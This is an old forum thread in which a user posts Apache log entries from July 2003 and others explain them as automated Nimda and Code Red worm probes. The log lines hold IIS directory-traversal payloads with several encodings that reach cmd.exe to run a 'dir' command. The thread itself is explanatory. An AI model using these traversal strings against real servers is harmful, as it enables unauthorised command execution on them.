[benbargagliotti]

I checked my apache log for the first time, and 99.9% of it are these:

/Jul/2003:00:34:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
1

24.242.2.66 - - [16/Jul/2003:00:34:08 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
1

24.242.2.66 - - [16/Jul/2003:00:34:08 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
1

24.242.2.66 - - [16/Jul/2003:00:34:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308

I read on another post that this has something to do with nimda. It is coming from several different IP addresses, with only the recent ones (like within 30 min) replying a ping. Is this a problem? Should I do something about this? Thanks

ben

[Scotttheking]

It's called idiots with very unpatched servers.
Don't worry about it.

[benbargagliotti]

oh, so these are deliberate attacks, like some pimply 15yo trying to hack my computer. these are just random worm attacks coming from someone elses affected server. got it.

ben

[Arkham_c]

Originally posted by benbargagliotti:
oh, so these are deliberate attacks, like some pimply 15yo trying to hack my computer. these are just random worm attacks coming from someone elses affected server. got it.

Nimda and code red just randomly pick IPs and try to infect them. They get lucky sometimes and hit a Windows server lacking patches. Boom, another machine is infected, and IT starts sending out attacks to random IPs. It's all very neat from a programming standpoint, but pretty pathetic from a Windows security perspective.

It's all automatic. There's no person at the other end. The virus is self-replicating.